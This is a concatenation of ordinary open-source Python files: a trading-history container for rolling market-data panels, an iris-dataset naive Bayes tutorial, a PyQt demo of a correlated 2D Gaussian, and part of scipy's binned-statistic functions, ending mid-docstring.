return self.sids
@property
def all_panels(self):
yield self.buffer_panel
for panel in self.digest_panels.values():
yield panel
@property
def unique_frequencies(self):
"""
Return an iterator over all the unique frequencies serviced by this
container.
"""
return iterkeys(self.largest_specs)
    @with_environment()
    def _add_frequency(self, spec, dt, data, env=None):
        """
        Adds a new frequency to the container. This reshapes the buffer_panel
        if needed.

        Returns a FrequencyDelta; its buffer_delta is None when a fresh
        buffer panel was created, 0 when no resize was needed, otherwise
        the number of bars added.
        """
        freq = spec.frequency
        self.largest_specs[freq] = spec
        new_buffer_len = 0

        if freq.max_bars > self.buffer_panel.window_length:
            # More bars need to be held in the buffer_panel to support this
            # freq
            if freq.data_frequency \
                    != self.buffer_spec.frequency.data_frequency:
                # If the data_frequencies are not the same, then we need to
                # create a fresh buffer.
                self.buffer_panel = self.create_buffer_panel(
                    dt, bar_data=data,
                )
                new_buffer_len = None
            else:
                # The frequencies are the same, we just need to add more bars.
                self._resize_panel(
                    self.buffer_panel,
                    freq.max_bars,
                    dt,
                    self.buffer_spec.frequency,
                )
                new_buffer_len = freq.max_minutes
                # update the current buffer_spec to reflect the new length.
                self.buffer_spec.bar_count = new_buffer_len + 1

        if spec.bar_count > 1:
            # This spec has more than one bar, construct a digest panel for it.
            self.digest_panels[freq] = self._create_digest_panel(
                dt, spec=spec, env=env,
            )
        else:
            # single-bar specs are served straight from the buffer panel;
            # just track the current window boundaries for this frequency
            self.cur_window_starts[freq] = dt
            self.cur_window_closes[freq] = freq.window_close(
                self.cur_window_starts[freq]
            )

        # prior-values rows are keyed by (freq_str, field); pick up the
        # rows for the new frequency
        self.last_known_prior_values = self.last_known_prior_values.reindex(
            index=self.prior_values_index,
        )

        return FrequencyDelta(freq, new_buffer_len)
    def _add_field(self, field):
        """
        Adds a new field to the container and realigns all panels to the
        enlarged field index.  Returns the field that was added.
        """
        # self.fields is already sorted, so we just need to insert the new
        # field in the correct index.
        ls = list(self.fields)
        insort_left(ls, field)
        self.fields = pd.Index(ls)
        # unset fillable fields cache
        self._ffillable_fields = None

        self._realign_fields()
        # prior-values rows are keyed by (freq_str, field); pick up rows
        # for the new field
        self.last_known_prior_values = self.last_known_prior_values.reindex(
            index=self.prior_values_index,
        )
        return field
@with_environment()
def _add_length(self, spec, dt, env=None):
"""
Increases the length of the digest panel for spec.frequency. If this
does not have a panel, and one is needed; a digest panel will be
constructed.
"""
old_count = self.largest_specs[spec.frequency].bar_count
self.largest_specs[spec.frequency] = spec
delta = spec.bar_count - old_count
panel = self.digest_panels.get(spec.frequency)
if panel is None:
# The old length for this frequency was 1 bar, meaning no digest
# panel was held. We must construct a new one here.
panel = self._create_digest_panel(
dt, spec=spec, env=env,
)
else:
self._resize_panel(
panel, spec.bar_count - 1, dt, freq=spec.frequency, env=env,
)
self.digest_panels[spec.frequency] = panel
return LengthDelta(spec.frequency, delta)
@with_environment()
def _resize_panel(self, panel, size, dt, freq, env=None):
"""
Resizes a panel, fills the date_buf with the correct values.
"""
# This is the oldest datetime that will be shown in the current window
# of the panel.
oldest_dt = pd.Timestamp(panel.start_date, tz='utc',)
delta = size - panel.window_length
# Construct the missing dates.
missing_dts = self._create_window_date_buf(
delta, freq.unit_str, freq.data_frequency, oldest_dt,
)
panel.extend_back(missing_dts)
@with_environment()
def _create_window_date_buf(self,
window,
unit_str,
data_frequency,
dt,
env=None):
"""
Creates a window length date_buf looking backwards from dt.
"""
if unit_str == 'd':
# Get the properly key'd datetime64 out of the pandas Timestamp
if data_frequency != 'daily':
arr = env.open_close_window(
dt,
window,
offset=-window,
).market_close.astype('datetime64[ns]').values
else:
arr = env.open_close_window(
dt,
window,
offset=-window,
).index.values
return arr
else:
return env.market_minute_window(
env.previous_market_minute(dt),
window,
step=-1,
)[::-1].values
@with_environment()
def _create_panel(self, dt, spec, env=None):
"""
Constructs a rolling panel with a properly aligned date_buf.
"""
dt = normalize_to_data_freq(spec.frequency.data_frequency, dt)
window = spec.bar_count - 1
date_buf = self._create_window_date_buf(
window,
spec.frequency.unit_str,
spec.frequency.data_frequency,
dt,
env=env,
)
panel = RollingPanel(
window=window,
items=self.fields,
sids=self.sids,
initial_dates=date_buf,
)
return panel
@with_environment()
def _create_digest_panel(self,
dt,
spec,
window_starts=None,
window_closes=None,
env=None):
"""
Creates a digest panel, setting the window_starts and window_closes.
If window_starts or window_closes are None, then self.cur_window_starts
or self.cur_window_closes will be used.
"""
freq = spec.frequency
window_starts = window_starts if window_starts is not None \
else self.cur_window_starts
window_closes = window_closes if window_closes is not None \
else self.cur_window_closes
window_starts[freq] = freq.normalize(dt)
window_closes[freq] = freq.window_close(window_starts[freq])
return self._create_panel(dt, spec, env=env)
def ensure_spec(self, spec, dt, bar_data):
"""
Ensure that this container has enough space to hold the data for the
given spec. This returns a HistoryContainerDelta to represent the
changes in shape that the container made to support the new
HistorySpec.
"""
updated = {}
if spec.field not in self.fields:
updated['field'] = self._add_field(spec.field)
if spec.frequency not in self.largest_specs:
updated['frequency_delta'] = self._add_frequency(
spec, dt, bar_data,
)
if spec.bar_count > self.largest_specs[spec.frequency].bar_count:
updated['length_delta'] = self._add_length(spec, dt)
return HistoryContainerDelta(**updated)
def add_sids(self, to_add):
"""
Add new sids to the container.
"""
self.sids = pd.Index(
sorted(self.sids.union(_ensure_index(to_add))),
)
self._realign_sids()
def drop_sids(self, to_drop):
"""
Remove sids from the container.
"""
self.sids = pd.Index(
sorted(self.sids.difference(_ensure_index(to_drop))),
)
self._realign_sids()
def _realign_sids(self):
"""
Realign our constituent panels after adding or removing sids.
"""
self.last_known_prior_values = self.last_known_prior_values.reindex(
columns=self.sids,
)
for panel in self.all_panels:
panel.set_minor_axis(self.sids)
def _realign_fields(self):
self.last_known_prior_values = self.last_known_prior_values.reindex(
index=self.prior_values_index,
)
for panel in self.all_panels:
panel.set_items(self.fields)
@with_environment()
def create_digest_panels(self,
initial_sids,
initial_dt,
env=None):
"""
Initialize a RollingPanel for each unique panel frequency being stored
by this container. Each RollingPanel pre-allocates enough storage
space to service the highest bar-count of any history call that it
serves.
"""
# Map from frequency -> first/last minute of the next digest to be
# rolled for that frequency.
first_window_starts = {}
first_window_closes = {}
# Map from frequency -> digest_panels.
panels = {}
for freq, largest_spec in iteritems(self.largest_specs):
if largest_spec.bar_count == 1:
# No need to allocate a digest panel; this frequency will only
# ever use data drawn from self.buffer_panel.
first_window_starts[freq] = freq.normalize(initial_dt)
first_window_closes[freq] = freq.window_close(
first_window_starts[freq]
)
continue
dt = initial_dt
rp = self._create_digest_panel(
dt,
spec=largest_spec,
window_starts=first_window_starts,
window_closes=first_window_closes,
env=env,
)
panels[freq] = rp
return panels, first_window_starts, first_window_closes
def create_buffer_panel(self, initial_dt, bar_data):
"""
Initialize a RollingPanel containing enough minutes to service all our
frequencies.
"""
max_bars_needed = max(
freq.max_bars for freq in self.unique_frequencies
)
freq = '1m' if self.data_frequency == 'minute' else '1d'
spec = HistorySpec(
max_bars_needed + 1, freq, None, None, self.data_frequency,
)
rp = self._create_panel(
initial_dt, spec,
)
self.buffer_spec = spec
if bar_data is not None:
frame = self.frame_from_bardata(bar_data, initial_dt)
rp.add_frame(initial_dt, frame)
return rp
def convert_columns(self, values):
"""
If columns have a specific type you want to enforce, overwrite this
method and return the transformed values.
"""
return values
    def digest_bars(self, history_spec, do_ffill):
        """
        Get the last (history_spec.bar_count - 1) bars from self.digest_panel
        for the requested HistorySpec.

        Returns a (values ndarray, dates index) pair.
        """
        bar_count = history_spec.bar_count
        if bar_count == 1:
            # slicing with [1 - bar_count:] doesn't work when bar_count == 1,
            # so special-casing this.
            res = pd.DataFrame(index=[], columns=self.sids, dtype=float)
            return res.values, res.index

        field = history_spec.field

        # Panel axes are (field, dates, sids). We want just the entries for
        # the requested field, the last (bar_count - 1) data points, and all
        # sids.
        digest_panel = self.digest_panels[history_spec.frequency]
        frame = digest_panel.get_current(field, raw=True)
        if do_ffill:
            # Do forward-filling *before* truncating down to the requested
            # number of bars. This protects us from losing data if an illiquid
            # stock has a gap in its price history.
            filled = ffill_digest_frame_from_prior_values(
                history_spec.frequency,
                history_spec.field,
                frame,
                self.last_known_prior_values,
                raw=True
                # Truncate only after we've forward-filled
            )
            indexer = slice(1 - bar_count, None)
            return filled[indexer], digest_panel.current_dates()[indexer]
        else:
            indexer = slice(1 - bar_count, None)
            return frame[indexer, :], digest_panel.current_dates()[indexer]
def buffer_panel_minutes(self,
buffer_panel,
earliest_minute=None,
latest_minute=None,
raw=False):
"""
Get the minutes in @buffer_panel between @earliest_minute and
@latest_minute, inclusive.
@buffer_panel can be a RollingPanel or a plain Panel. If a
RollingPanel is supplied, we call `get_current` to extract a Panel
object.
If no value is specified for @earliest_minute, use all the minutes we
have up until @latest minute.
If no value for @latest_minute is specified, use all values up until
the latest minute.
"""
if isinstance(buffer_panel, RollingPanel):
buffer_panel = buffer_panel.get_current(start=earliest_minute,
end=latest_minute,
raw=raw)
return buffer_panel
# Using .ix here rather than .loc because loc requires that the keys
# are actually in the index, whereas .ix returns all the values between
# earliest_minute and latest_minute, which is what we want.
return buffer_panel.ix[:, earliest_minute:latest_minute, :]
    def frame_from_bardata(self, data, algo_dt):
        """
        Create a DataFrame from the given BarData and algo dt.

        Result is fields x sids; any sid with no data, or whose quote is
        not stamped with algo_dt, is left as NaN.
        """
        data = data._data
        # multiplying an uninitialised array by nan fills it with NaNs
        frame_data = np.empty((len(self.fields), len(self.sids))) * np.nan

        for j, sid in enumerate(self.sids):
            sid_data = data.get(sid)
            if not sid_data:
                continue
            if algo_dt != sid_data['dt']:
                # stale quote for this sid; leave its column as NaN
                continue
            for i, field in enumerate(self.fields):
                frame_data[i, j] = sid_data.get(field, np.nan)

        return pd.DataFrame(
            frame_data,
            index=self.fields.copy(),
            columns=self.sids.copy(),
        )
    def update(self, data, algo_dt):
        """
        Takes the bar at @algo_dt's @data, checks to see if we need to roll any
        new digests, then adds new data to the buffer panel.
        """
        frame = self.frame_from_bardata(data, algo_dt)

        # capture last-known values and roll any completed windows into
        # digests *before* the new bar enters the buffer
        self.update_last_known_values()
        self.update_digest_panels(algo_dt, self.buffer_panel)

        self.buffer_panel.add_frame(algo_dt, frame)
def update_digest_panels(self, algo_dt, buffer_panel, freq_filter=None):
"""
Check whether @algo_dt is greater than cur_window_close for any of our
frequencies. If so, roll a digest for that frequency using data drawn
from @buffer panel and insert it into the appropriate digest panels.
If @freq_filter is specified, only use the given data to update
frequencies on which the filter returns True.
This takes `buffer_panel` as an argument rather than using
self.buffer_panel so that this method can be used to add supplemental
data from an external source.
"""
for frequency in filter(freq_filter, self.unique_frequencies):
# We don't keep a digest panel if we only have a length-1 history
# spec for a given frequency
digest_panel = self.digest_panels.get(frequency, None)
while algo_dt > self.cur_window_closes[frequency]:
earliest_minute = self.cur_window_starts[frequency]
latest_minute = self.cur_window_closes[frequency]
minutes_to_process = self.buffer_panel_minutes(
buffer_panel,
earliest_minute=earliest_minute,
latest_minute=latest_minute,
raw=True
)
if digest_panel is not None:
# Create a digest from minutes_to_process and add it to
# digest_panel.
digest_frame = self.create_new_digest_frame(
minutes_to_process,
self.fields,
self.sids
)
digest_panel.add_frame(
latest_minute,
digest_frame,
self.fields,
self.sids
)
# Update panel start/close for this frequency.
self.cur_window_starts[frequency] = \
frequency.next_window_start(latest_minute)
self.cur_window_closes[frequency] = \
frequency.window_close(self.cur_window_starts[frequency])
    def frame_to_series(self, field, frame, columns=None):
        """
        Convert a frame with a DatetimeIndex and sid columns into a series with
        a sid index, using the aggregator defined by the given field.

        Returns an ndarray of one value per sid.  An empty frame yields 0
        per sid for volume and NaN for everything else.
        """
        if isinstance(frame, pd.DataFrame):
            columns = frame.columns
            frame = frame.values

        if not len(frame):
            return pd.Series(
                data=(0 if field == 'volume' else np.nan),
                index=columns,
            ).values

        if field in ['price', 'close_price']:
            # shortcircuit for full last row
            vals = frame[-1]
            if np.all(~np.isnan(vals)):
                return vals
            # otherwise: last non-NaN value per sid
            return ffill(frame)[-1]
        elif field == 'open_price':
            # first non-NaN value per sid
            return bfill(frame)[0]
        elif field == 'volume':
            return np.nansum(frame, axis=0)
        elif field == 'high':
            return np.nanmax(frame, axis=0)
        elif field == 'low':
            return np.nanmin(frame, axis=0)
        else:
            raise ValueError("Unknown field {}".format(field))
def aggregate_ohlcv_panel(self,
fields,
ohlcv_panel,
items=None,
minor_axis=None):
"""
Convert an OHLCV Panel into a DataFrame by aggregating each field's
frame into a Series.
"""
vals = ohlcv_panel
if isinstance(ohlcv_panel, pd.Panel):
vals = ohlcv_panel.values
items = ohlcv_panel.items
minor_axis = ohlcv_panel.minor_axis
data = [
self.frame_to_series(
field,
vals[items.get_loc(field)],
minor_axis
)
for field in fields
]
return np.array(data)
def create_new_digest_frame(self, buffer_minutes, items=None,
minor_axis=None):
"""
Package up minutes in @buffer_minutes into a single digest frame.
"""
return self.aggregate_ohlcv_panel(
self.fields,
buffer_minutes,
items=items,
minor_axis=minor_axis
)
    def update_last_known_values(self):
        """
        Store the non-NaN values from our oldest frame in each frequency.

        These values seed forward-filling when a later window starts with
        missing data. Writes directly into
        ``self.last_known_prior_values.values`` keyed by
        ``(frequency, field)``.
        """
        ffillable = self.ffillable_fields
        if not len(ffillable):
            # Nothing to carry forward (e.g. only volume-like fields).
            return
        for frequency in self.unique_frequencies:
            # Prefer the digest panel for this frequency; fall back to the
            # raw minute buffer when no digest exists.
            digest_panel = self.digest_panels.get(frequency, None)
            if digest_panel:
                oldest_known_values = digest_panel.oldest_frame(raw=True)
            else:
                oldest_known_values = self.buffer_panel.oldest_frame(raw=True)
            oldest_vals = oldest_known_values
            oldest_columns = self.fields
            for field in ffillable:
                f_idx = oldest_columns.get_loc(field)
                field_vals = oldest_vals[f_idx]
                # isnan would be fast, possible to use?
                non_nan_sids = np.where(pd.notnull(field_vals))
                key = (frequency.freq_str, field)
                # Raw positional write into the underlying ndarray; only
                # sids with real (non-null) values are updated.
                key_loc = self.last_known_prior_values.index.get_loc(key)
                self.last_known_prior_values.values[
                    key_loc, non_nan_sids
                ] = field_vals[non_nan_sids]
    def get_history(self, history_spec, algo_dt):
        """
        Main API used by the algoscript is mapped to this function.

        Selects from the overarching history panel the values for the
        @history_spec at the given @algo_dt. Returns a DataFrame of
        digest bars plus one freshly-aggregated row for the current
        (partial) period, indexed by date with sid columns.
        """
        field = history_spec.field
        do_ffill = history_spec.ffill
        # Get our stored values from periods prior to the current period.
        digest_frame, index = self.digest_bars(history_spec, do_ffill)
        # Get minutes from our buffer panel to build the last row of the
        # returned frame.
        buffer_panel = self.buffer_panel_minutes(
            self.buffer_panel,
            earliest_minute=self.cur_window_starts[history_spec.frequency],
            raw=True
        )
        buffer_frame = buffer_panel[self.fields.get_loc(field)]
        if do_ffill:
            # Seed the fill from the last values known before this window
            # so leading NaNs in the buffer get realistic values.
            buffer_frame = ffill_buffer_from_prior_values(
                history_spec.frequency,
                field,
                buffer_frame,
                digest_frame,
                self.last_known_prior_values,
                raw=True
            )
        # Aggregate the partial current period down to a single row.
        last_period = self.frame_to_series(field, buffer_frame, self.sids)
        return fast_build_history_output(digest_frame,
                                         last_period,
                                         algo_dt,
                                         index=index,
                                         columns=self.sids)
def fast_build_history_output(buffer_frame,
                              last_period,
                              algo_dt,
                              index=None,
                              columns=None):
    """
    Optimized concatenation of DataFrame and Series for use in
    HistoryContainer.get_history.

    Stacks ``last_period`` underneath ``buffer_frame`` and appends
    ``algo_dt`` to the index. Relies on the inputs having compatible
    shapes.
    """
    values = buffer_frame
    if isinstance(buffer_frame, pd.DataFrame):
        # Unpack the frame so the vstack below works on raw arrays.
        values = buffer_frame.values
        index = buffer_frame.index
        columns = buffer_frame.columns
    stacked = np.vstack((values, last_period))
    new_index = fast_append_date_to_index(index, pd.Timestamp(algo_dt))
    return pd.DataFrame(data=stacked, index=new_index, columns=columns)
def fast_append_date_to_index(index, timestamp):
    """
    Return a new UTC DatetimeIndex equal to ``index`` with ``timestamp``
    appended. DatetimeIndex.append does not appear to work, so the
    concatenation is done on the raw datetime64 values.
    """
    extended = np.concatenate((index.values, np.array([timestamp.asm8])))
    return pd.DatetimeIndex(extended, tz='UTC')
| apache-2.0 |
qrsforever/workspace | python/learn/sklearn/l1/main.py | 1 | 2408 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# import urllib.request
from numpy import genfromtxt, zeros, array
# pylab 是matplotlib的接口
from pylab import plot, figure, subplot, hist, xlim, show
from sklearn.naive_bayes import GaussianNB
# url = 'http://aima.cs.berkeley.edu/data/iris.csv'
# u = urllib.request.urlopen(url)
# localFile = open('iris.csv', 'w')
# mybytes = u.read()
# mystr = mybytes.decode('utf8')
# localFile.write(mystr)
# localFile.close()
# Columns: sepal length, petal length, sepal width, petal width
# Example row: 5.1, 3.5, 1.4, 0.2, setosa
data = genfromtxt('iris.csv', delimiter=',', usecols=(0,1,2,3))
# print(data)
# print(data.size)
# The shape attribute gives the dataset dimensions.
# print(data.shape)
target = genfromtxt('iris.csv', delimiter=',', usecols=(4,), dtype=str)
# print(target)
# print(target.shape)
# Class labels: {'virginica', 'setosa', 'versicolor'}
# print(set(target))
# Element-wise comparison returns a boolean mask array.
# print(target=='setosa')
# print(data[target=='setosa', 0])
# 2-D scatter plot of sepal length vs. sepal width, one color per class
plot(data[target=='setosa', 0], data[target=='setosa', 2], 'bo')
plot(data[target=='virginica', 0], data[target=='virginica', 2], 'ro')
plot(data[target=='versicolor', 0], data[target=='versicolor', 2], 'go')
# show()
# Per-feature histograms of the first column (sepal length)
xmin = min(data[:, 0])
xmax = max(data[:, 0])
print(xmin, xmax)
figure()
# 4 rows x 1 column grid, first subplot
subplot(411)
# hist counts how many samples fall into each value bin, whereas plot
# draws points from explicit x/y coordinate vectors.
hist(data[target=='setosa', 0], color='b', alpha=.7)
xlim(xmin, xmax)
subplot(412)
hist(data[target=='virginica', 0], color='r', alpha=.7)
xlim(xmin, xmax)
subplot(413)
hist(data[target=='versicolor', 0], color='g', alpha=.7)
xlim(xmin, xmax)
subplot(414)
hist(data[:, 0], color='y', alpha=.7)
xlim(xmin, xmax)
# show()
# Encode the string labels as integer class ids
t = zeros(len(target))
t[target == 'setosa'] = 1
t[target == 'virginica'] = 2
t[target == 'versicolor'] = 3
# Classification: Gaussian naive Bayes
# (reference: http://www.cnblogs.com/pinard/p/6074222.html)
classifier = GaussianNB()
classifier.fit(data, t)
print(data)
print(t)
print(classifier.predict(data))
# Synthetic sample (a tweaked copy of the last row of data)
test=array([5.7, 2.8, 5.3, 2.0])
# predict expects a 2-D array, hence the reshape
# print(test.reshape(1, -1))
print(classifier.predict(test.reshape(1, -1)))
# Tutorial source: http://python.jobbole.com/83563/
| mit |
kit-cel/lecture-examples | wt/uebung/u5_2D_gaussian.py | 1 | 5513 | #!/usr/bin/env python3
"""
Simulation einer 2D Normalverteilung. Gezeigt werden neben zuf.
Realisierungen auch die Höhenlinie der Dichte für K=9.
"""
from functools import partial
import numpy as np
import matplotlib as mp
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from PyQt5 import QtWidgets, QtCore
class Canvas(FigureCanvasQTAgg):
    """Ultimately, this is a QWidget"""
    def __init__(self, parent=None, width=5, height=4, dpi=100):
        """Creates a figure and axes and draws periodically on it."""
        # Create a figure and axes
        fig = mp.figure.Figure(figsize=(width, height), dpi=dpi)
        self.axes = fig.add_axes((0.1, 0.1, 0.85, 0.85))
        self.axes.set_aspect('equal')
        # Initialize widget and update timer
        super(Canvas, self).__init__(fig)
        self.setParent(parent)
        self.setSizePolicy(QtWidgets.QSizePolicy.Expanding,
                           QtWidgets.QSizePolicy.Expanding)
        self.updateGeometry()
        # plot parameter defaults (std deviations and correlation of the
        # 2-D Gaussian, plus how many samples each timer tick adds)
        self.sigma1 = self.sigma2 = 1.0
        self.rho = 0
        self.points_per_update = 100
        # plot data
        self.reset()
        self.plot_gaussian_samples()
        # add a new batch of samples every 100 ms ...
        draw_timer = QtCore.QTimer(self)
        draw_timer.timeout.connect(self.plot_gaussian_samples)
        draw_timer.start(100)
        # ... and wipe the accumulated scatter every 20 s
        clear_timer = QtCore.QTimer(self)
        clear_timer.timeout.connect(self.reset)
        clear_timer.start(20 * 1000)
    def set_param(self, name, value):
        """Update a plot parameter, clear axes"""
        setattr(self, name, value)
        self.reset()
    def reset(self):
        """Draw the theoretical contour line"""
        # Fixed axis limits so the view does not jump between redraws.
        self.axes.clear()
        self.axes.set_xlim(-6, 6)
        self.axes.set_ylim(-5, 5)
        self.draw_contour_line()
    def draw_contour_line(self):
        """Draw the theoretical contour line"""
        # get parameters and math functions
        o1, o2, r = self.sigma1, self.sigma2, self.rho
        sqrt, sin, cos, pi = np.sqrt, np.sin, np.cos, np.pi
        # calculate ellipse parameters (K = 3**2 = 9, i.e. the density
        # contour at Mahalanobis distance 3)
        K = 3 ** 2
        # Rotation angle of the ellipse; the arctan formula degenerates
        # when o1 == o2, where the angle is exactly pi/4.
        g = 0.5 * np.arctan(2 * r * o1 * o2 / (o2**2 - o1**2)) \
            if o1 != o2 else pi/4
        # Semi-axes of the K-contour ellipse.
        a = o1 * o2 * sqrt(K * (1 - r**2) / (
            (o1 * sin(g)) ** 2 +
            (o2 * cos(g)) ** 2 +
            2 * r * o1 * o2 * sin(g) * cos(g)
        ))
        b = o1 * o2 * sqrt(K * (1 - r**2) / (
            (o1 * cos(g)) ** 2 +
            (o2 * sin(g)) ** 2 -
            2 * r * o1 * o2 * sin(g) * cos(g)
        ))
        # add contour line (ellipse)
        self.axes.add_artist(mp.patches.Ellipse(
            xy=(0, 0), width=2 * a, height=2 * b, angle=-180 / pi * g,
            facecolor='none', edgecolor='r', zorder=2, linewidth=2
        ))
        self.draw()
    def plot_gaussian_samples(self):
        """Put some samples of the current distribution on the axes"""
        o1, o2, r = self.sigma1, self.sigma2, self.rho
        # get two std norm distributed vectors
        x, y = np.random.normal(0, 1, (2, self.points_per_update))
        # scaling parameters
        r1, r2 = np.sqrt((1 + r) / 2), np.sqrt((1 - r) / 2)
        # mix the random vectors to get desired correlation
        x, y = o1 * (x * r1 + y * r2), o2 * (x * r1 - y * r2)
        # plot and draw
        self.axes.plot(x, y, 'ko', zorder=1, alpha=0.5, ms=2)
        self.draw()
class FigureCanvasWithControls(QtWidgets.QWidget):
    """Canvas plus one labelled slider per Gaussian parameter."""
    def __init__(self):
        super(FigureCanvasWithControls, self).__init__()
        layout = QtWidgets.QVBoxLayout(self)
        canvas = Canvas(self, width=5, height=4, dpi=100)
        # (name, min, max, default) for each adjustable parameter
        params = (('sigma1', 0.1, 2.0, 1.0),
                  ('sigma2', 0.1, 2.0, 1.0),
                  ('rho', -0.99, 0.99, 0.0))
        # create a control for each figure parameter
        for name, lo, hi, default in params:
            row = QtWidgets.QHBoxLayout()
            layout.addLayout(row)
            # label
            label = QtWidgets.QLabel(name)
            label.setMinimumWidth(50)
            label.setAlignment(QtCore.Qt.AlignRight)
            row.addWidget(label, 0)
            # value slider (integer positions, mapped to [lo, hi] below)
            slider = QtWidgets.QSlider(QtCore.Qt.Horizontal, self)
            slider.setRange(0, 200)
            slider.setSingleStep(2)
            slider.setPageStep(10)
            row.addWidget(slider, 1)
            # value display (read-only mirror of the slider value)
            text = QtWidgets.QLineEdit()
            text.setReadOnly(True)
            text.setMaximumWidth(50)
            text.setFocusPolicy(QtCore.Qt.NoFocus)
            text.setAlignment(QtCore.Qt.AlignRight)
            row.addWidget(text, 0)
            def update(name, lo, hi, text, value):
                """Convert int slider value to target range"""
                value = value / slider.maximum() * (hi - lo) + lo
                canvas.set_param(name, value)
                text.setText("{:.2f}".format(value))
            # update figure canvas on value change; loop variables are
            # bound via the partial to avoid late-binding surprises
            slider.valueChanged.connect(partial(update, name, lo, hi, text))
            slider.setValue(round((default - lo) / (hi - lo) * slider.maximum()))
        layout.addWidget(canvas)
if __name__ == '__main__':
    import sys
    # Standard Qt bootstrap: create the app, show the widget, run the loop.
    app = QtWidgets.QApplication(sys.argv)
    win = FigureCanvasWithControls()
    win.show()
    sys.exit(app.exec_())
| gpl-2.0 |
FRidh/scipy | scipy/stats/_binned_statistic.py | 17 | 17622 | from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy._lib.six import callable
from collections import namedtuple
def binned_statistic(x, values, statistic='mean',
                     bins=10, range=None):
    """
    Compute a binned statistic for a set of data.

    A generalization of a histogram: the domain is divided into bins and,
    rather than only counting points per bin, an arbitrary statistic of
    the `values` falling in each bin is computed.

    Parameters
    ----------
    x : array_like
        A sequence of values to be binned.
    values : array_like
        The values on which the statistic will be computed. This must be
        the same shape as `x`.
    statistic : string or callable, optional
        The statistic to compute (default is 'mean'). One of 'mean',
        'median', 'count', 'sum', or a user-defined function mapping a
        1D array of values to a single numerical statistic. Empty bins
        are NaN for 'mean'/'median', 0 for 'count'/'sum', and
        ``function([])`` (or NaN on error) for callables.
    bins : int or sequence of scalars, optional
        The number of equal-width bins in the given range (10 by
        default), or a sequence of bin edges including the rightmost
        edge. Values below the lowest edge go to bin 0; values beyond
        the highest edge go to ``bins[-1]``.
    range : (float, float) or [(float, float)], optional
        The lower and upper range of the bins; defaults to
        ``(x.min(), x.max())``. Values outside the range are ignored.

    Returns
    -------
    statistic : array
        The values of the selected statistic in each bin.
    bin_edges : array of dtype float
        Return the bin edges ``(length(statistic)+1)``.
    binnumber : 1-D ndarray of ints
        The bin index assigned to each observation; same length as
        `values`.

    See Also
    --------
    numpy.histogram, binned_statistic_2d, binned_statistic_dd

    Notes
    -----
    All but the last (righthand-most) bin is half-open; the last bin
    includes its right edge.

    .. versionadded:: 0.11.0
    """
    # Anything with a length (other than a single element) is treated as
    # explicit bin edges; wrap it in a one-element list for the
    # N-dimensional implementation.
    try:
        bins_len = len(bins)
    except TypeError:
        bins_len = 1
    if bins_len != 1:
        bins = [np.asarray(bins, float)]

    # A bare (lo, hi) pair becomes a one-element list of pairs.
    if range is not None and len(range) == 2:
        range = [range]

    medians, edges, binnumbers = binned_statistic_dd(
        [x], values, statistic, bins, range)

    BinnedStatisticResult = namedtuple('BinnedStatisticResult',
                                       ('statistic', 'bin_edges',
                                        'binnumber'))
    return BinnedStatisticResult(medians, edges[0], binnumbers)
def binned_statistic_2d(x, y, values, statistic='mean',
                        bins=10, range=None):
    """
    Compute a bidimensional binned statistic for a set of data.

    A generalization of histogram2d: the plane is divided into bins and,
    rather than only counting points per bin, an arbitrary statistic of
    the `values` falling in each bin is computed.

    Parameters
    ----------
    x : (N,) array_like
        A sequence of values to be binned along the first dimension.
    y : (M,) array_like
        A sequence of values to be binned along the second dimension.
    values : (N,) array_like
        The values on which the statistic will be computed. This must be
        the same shape as `x`.
    statistic : string or callable, optional
        The statistic to compute (default is 'mean'). One of 'mean',
        'median', 'count', 'sum', or a user-defined function mapping a
        1D array of values to a single numerical statistic. Empty bins
        are NaN for 'mean'/'median', 0 for 'count'/'sum', and
        ``function([])`` (or NaN on error) for callables.
    bins : int or [int, int] or array_like or [array, array], optional
        The bin specification: a shared bin count (nx=ny=bins), a count
        per dimension (nx, ny = bins), shared bin edges
        (x_edges = y_edges = bins), or per-dimension edges
        (x_edges, y_edges = bins).
    range : (2,2) array_like, optional
        The leftmost and rightmost edges of the bins along each
        dimension (when not given explicitly in `bins`):
        [[xmin, xmax], [ymin, ymax]]. Values outside are treated as
        outliers and not tallied.

    Returns
    -------
    statistic : (nx, ny) ndarray
        The values of the selected statistic in each two-dimensional bin
    x_edges : (nx + 1) ndarray
        The bin edges along the first dimension.
    y_edges : (ny + 1) ndarray
        The bin edges along the second dimension.
    binnumber : 1-D ndarray of ints
        The bin index assigned to each observation; same length as
        `values`.

    See Also
    --------
    numpy.histogram2d, binned_statistic, binned_statistic_dd

    Notes
    -----
    .. versionadded:: 0.11.0
    """
    # This code is based on np.histogram2d
    try:
        n_spec = len(bins)
    except TypeError:
        n_spec = 1

    # A single edge array is shared by both dimensions.
    if n_spec != 1 and n_spec != 2:
        shared_edges = np.asarray(bins, float)
        bins = [shared_edges, shared_edges]

    medians, edges, binnumbers = binned_statistic_dd(
        [x, y], values, statistic, bins, range)

    BinnedStatistic2dResult = namedtuple('BinnedStatistic2dResult',
                                         ('statistic', 'x_edge', 'y_edge',
                                          'binnumber'))
    return BinnedStatistic2dResult(medians, edges[0], edges[1], binnumbers)
def binned_statistic_dd(sample, values, statistic='mean',
                        bins=10, range=None):
    """
    Compute a multidimensional binned statistic for a set of data.

    A generalization of histogramdd: the space is divided into bins and,
    rather than only counting points per bin, an arbitrary statistic of
    the `values` falling in each bin is computed.

    Parameters
    ----------
    sample : array_like
        Data to histogram passed as a sequence of D arrays of length N,
        or as an (N,D) array.
    values : array_like
        The values on which the statistic will be computed. This must be
        the same shape as x.
    statistic : string or callable, optional
        The statistic to compute (default is 'mean'). One of 'mean',
        'median', 'count', 'sum', 'std', or a user-defined function
        mapping a 1D array of values to a single numerical statistic.
        Empty bins are NaN for 'mean'/'median', 0 for
        'count'/'sum'/'std', and ``function([])`` (or NaN on error)
        for callables.
    bins : sequence or int, optional
        The bin specification: a sequence of edge arrays per dimension,
        a bin count per dimension (nx, ny, ... = bins), or one shared
        bin count (nx=ny=...=bins).
    range : sequence, optional
        A sequence of lower and upper bin edges, used when edges are not
        given explicitly in `bins`. Defaults to the minimum and maximum
        values along each dimension.

    Returns
    -------
    statistic : ndarray, shape(nx1, nx2, nx3,...)
        The values of the selected statistic in each two-dimensional bin
    bin_edges : list of ndarrays
        A list of D arrays describing the (nxi + 1) bin edges for each
        dimension
    binnumber : 1-D ndarray of ints
        The (flattened) bin index assigned to each observation; same
        length as values.

    See Also
    --------
    np.histogramdd, binned_statistic, binned_statistic_2d

    Notes
    -----
